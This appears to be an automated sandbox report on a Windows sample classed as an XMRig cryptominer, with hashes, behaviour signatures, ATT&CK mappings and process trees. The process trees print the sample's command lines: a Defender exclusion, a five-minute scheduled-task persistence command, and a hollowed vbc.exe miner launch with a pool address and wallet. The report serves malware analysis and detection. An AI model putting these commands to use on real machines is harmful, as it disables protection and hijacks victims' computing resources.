xmrig | 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

Analysis

max time kernel
95s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2022 16:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
Size

1.1MB
MD5

19a474356662325b2059630216338194
SHA1

5537672751a37401bccf455f651d564bb314a924
SHA256

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512

d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
SSDEEP

24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4468-187-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4468-188-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/4468-189-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4468-190-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4468-192-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4468-194-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

AVPTQBAEW.exe

pid process

4716 AVPTQBAEW.exe

pid	process
4716	AVPTQBAEW.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AVPTQBAEW.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	AVPTQBAEW.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

AVPTQBAEW.exe

description pid process target process

PID 4716 set thread context of 4468 4716 AVPTQBAEW.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2844 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3784 timeout.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exeAVPTQBAEW.exe

pid process

4800 powershell.exe
4800 powershell.exe
1708 powershell.exe
1708 powershell.exe
4716 AVPTQBAEW.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

description	pid	process	target process
PID 4716 set thread context of 4468	4716	AVPTQBAEW.exe	vbc.exe

pid	process
2844	schtasks.exe

pid	process
3784	timeout.exe

pid	process
4800	powershell.exe
4800	powershell.exe
1708	powershell.exe
1708	powershell.exe
4716	AVPTQBAEW.exe

pid	process
664

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exepowershell.exeAVPTQBAEW.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1088	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	4716	AVPTQBAEW.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeLockMemoryPrivilege	4468	vbc.exe
Token: SeLockMemoryPrivilege	4468	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

4468 vbc.exe

pid	process
4468	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.execmd.exeAVPTQBAEW.execmd.exe

description	pid	process	target process
PID 1088 wrote to memory of 4800	1088	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	powershell.exe
PID 1088 wrote to memory of 4800	1088	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	powershell.exe
PID 1088 wrote to memory of 2088	1088	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	cmd.exe
PID 1088 wrote to memory of 2088	1088	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	cmd.exe
PID 2088 wrote to memory of 3784	2088	cmd.exe	timeout.exe
PID 2088 wrote to memory of 3784	2088	cmd.exe	timeout.exe
PID 2088 wrote to memory of 4716	2088	cmd.exe	AVPTQBAEW.exe
PID 2088 wrote to memory of 4716	2088	cmd.exe	AVPTQBAEW.exe
PID 4716 wrote to memory of 1708	4716	AVPTQBAEW.exe	powershell.exe
PID 4716 wrote to memory of 1708	4716	AVPTQBAEW.exe	powershell.exe
PID 4716 wrote to memory of 4676	4716	AVPTQBAEW.exe	cmd.exe
PID 4716 wrote to memory of 4676	4716	AVPTQBAEW.exe	cmd.exe
PID 4676 wrote to memory of 2844	4676	cmd.exe	schtasks.exe
PID 4676 wrote to memory of 2844	4676	cmd.exe	schtasks.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe
PID 4716 wrote to memory of 4468	4716	AVPTQBAEW.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
"C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E6C.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:3784

C:\ProgramData\WindowsMail\AVPTQBAEW.exe
"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4676

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
5⤵
- Creates scheduled task(s)
PID:2844

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4468

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WindowsMail\AVPTQBAEW.exe

Filesize
1.1MB

MD5
19a474356662325b2059630216338194

SHA1
5537672751a37401bccf455f651d564bb314a924

SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

Download Submit
C:\ProgramData\WindowsMail\AVPTQBAEW.exe

Filesize
1.1MB

MD5
19a474356662325b2059630216338194

SHA1
5537672751a37401bccf455f651d564bb314a924

SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7E6C.tmp.bat

Filesize
149B

MD5
3c23698d0bda9a43bc00bd66c3dff020

SHA1
af82ae1b8e8a39f950b589e0f4ea173c35c85081

SHA256
02a9a94a2dc1e7e4961b0815c9402e608ee496ee9b983a058ab0339b500cce92

SHA512
3a88d12d0366dc545e385c5acb29bff226f6a4759a098094dcb77cc21e23a706c5a329aef691194de76f1468016e66a0993047ab5376f3be128b5fd118482598

Download Submit
memory/1088-144-0x00007FF8F2470000-0x00007FF8F25BE000-memory.dmp

Filesize
1.3MB

Download
memory/1088-148-0x0000000000F50000-0x0000000001202000-memory.dmp

Filesize
2.7MB

Download
memory/1088-138-0x0000000000F50000-0x0000000001202000-memory.dmp

Filesize
2.7MB

Download
memory/1088-140-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/1088-141-0x00007FF90F430000-0x00007FF90F45B000-memory.dmp

Filesize
172KB

Download
memory/1088-142-0x0000000000F50000-0x0000000001202000-memory.dmp

Filesize
2.7MB

Download
memory/1088-143-0x0000000000F50000-0x0000000001202000-memory.dmp

Filesize
2.7MB

Download
memory/1088-137-0x00007FF910670000-0x00007FF910811000-memory.dmp

Filesize
1.6MB

Download
memory/1088-145-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/1088-139-0x00000000033B0000-0x00000000033F3000-memory.dmp

Filesize
268KB

Download
memory/1088-150-0x00000000033B0000-0x00000000033F3000-memory.dmp

Filesize
268KB

Download
memory/1088-152-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/1088-133-0x00007FF8F4750000-0x00007FF8F47FA000-memory.dmp

Filesize
680KB

Download
memory/1088-134-0x00007FF910940000-0x00007FF9109DE000-memory.dmp

Filesize
632KB

Download
memory/1088-136-0x00007FF8F3BC0000-0x00007FF8F3C7D000-memory.dmp

Filesize
756KB

Download
memory/1088-135-0x00007FF90C790000-0x00007FF90C7A2000-memory.dmp

Filesize
72KB

Download
memory/1708-178-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/1708-173-0x0000000000000000-mapping.dmp

Download
memory/2088-147-0x0000000000000000-mapping.dmp

Download
memory/2844-177-0x0000000000000000-mapping.dmp

Download
memory/3784-154-0x0000000000000000-mapping.dmp

Download
memory/4468-194-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4468-192-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4468-191-0x000001BFBB5F0000-0x000001BFBB610000-memory.dmp

Filesize
128KB

Download
memory/4468-190-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4468-189-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4468-188-0x0000000140343234-mapping.dmp

Download
memory/4468-193-0x000001BFBB650000-0x000001BFBB690000-memory.dmp

Filesize
256KB

Download
memory/4468-187-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4468-196-0x000001C04DE40000-0x000001C04DE60000-memory.dmp

Filesize
128KB

Download
memory/4468-195-0x000001BFBB690000-0x000001BFBB6B0000-memory.dmp

Filesize
128KB

Download
memory/4468-197-0x000001BFBB690000-0x000001BFBB6B0000-memory.dmp

Filesize
128KB

Download
memory/4468-198-0x000001C04DE40000-0x000001C04DE60000-memory.dmp

Filesize
128KB

Download
memory/4676-176-0x0000000000000000-mapping.dmp

Download
memory/4716-167-0x00007FF90F430000-0x00007FF90F45B000-memory.dmp

Filesize
172KB

Download
memory/4716-172-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/4716-171-0x00007FF8F2470000-0x00007FF8F25BE000-memory.dmp

Filesize
1.3MB

Download
memory/4716-170-0x0000000000B30000-0x0000000000DE2000-memory.dmp

Filesize
2.7MB

Download
memory/4716-169-0x0000000000B30000-0x0000000000DE2000-memory.dmp

Filesize
2.7MB

Download
memory/4716-166-0x0000000000B30000-0x0000000000DE2000-memory.dmp

Filesize
2.7MB

Download
memory/4716-179-0x00007FF90E870000-0x00007FF90E897000-memory.dmp

Filesize
156KB

Download
memory/4716-180-0x00007FF8F2430000-0x00007FF8F2465000-memory.dmp

Filesize
212KB

Download
memory/4716-181-0x00007FF8EE4D0000-0x00007FF8EE5D2000-memory.dmp

Filesize
1.0MB

Download
memory/4716-182-0x00007FF9108D0000-0x00007FF91093B000-memory.dmp

Filesize
428KB

Download
memory/4716-183-0x00007FF90DC40000-0x00007FF90DC7B000-memory.dmp

Filesize
236KB

Download
memory/4716-184-0x0000000000B30000-0x0000000000DE2000-memory.dmp

Filesize
2.7MB

Download
memory/4716-185-0x00000000030E0000-0x0000000003123000-memory.dmp

Filesize
268KB

Download
memory/4716-186-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/4716-168-0x00000000030E0000-0x0000000003123000-memory.dmp

Filesize
268KB

Download
memory/4716-165-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/4716-161-0x00007FF910940000-0x00007FF9109DE000-memory.dmp

Filesize
632KB

Download
memory/4716-164-0x00007FF910670000-0x00007FF910811000-memory.dmp

Filesize
1.6MB

Download
memory/4716-163-0x00007FF8F3BC0000-0x00007FF8F3C7D000-memory.dmp

Filesize
756KB

Download
memory/4716-162-0x00007FF90C790000-0x00007FF90C7A2000-memory.dmp

Filesize
72KB

Download
memory/4716-160-0x00007FF8F4750000-0x00007FF8F47FA000-memory.dmp

Filesize
680KB

Download
memory/4716-156-0x0000000000000000-mapping.dmp

Download
memory/4800-155-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/4800-151-0x00007FF8F3C80000-0x00007FF8F4741000-memory.dmp

Filesize
10.8MB

Download
memory/4800-149-0x000002041F040000-0x000002041F062000-memory.dmp

Filesize
136KB

Download
memory/4800-146-0x0000000000000000-mapping.dmp

Download